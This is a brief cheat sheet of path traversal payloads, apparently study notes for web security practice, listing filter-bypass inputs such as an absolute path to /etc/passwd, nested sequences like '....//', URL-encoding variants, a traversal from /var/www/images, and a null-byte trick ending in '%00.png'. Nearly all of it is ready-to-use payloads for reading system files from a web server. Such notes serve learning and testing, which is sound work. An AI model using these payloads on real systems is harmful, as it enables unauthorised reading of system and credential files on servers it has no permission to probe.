#Use an absolute path
filename=/etc/passwd

#Use nested traversal
....//
....\/
.|./

#Use ? has character
- ? main any character (like in linux)

#Utilize URL Encoding
- 16-bit
- Double URL
- UTF-8

#Burp Suite Professional
	§ Contains encoded path traversal sequences

#Start with the base file and traverse from there
filename=/var/www/images/../../../etc/passwd

#Bypass the requirement to end with a file extension by using a null byte
filename=../../../etc/passwd%00.png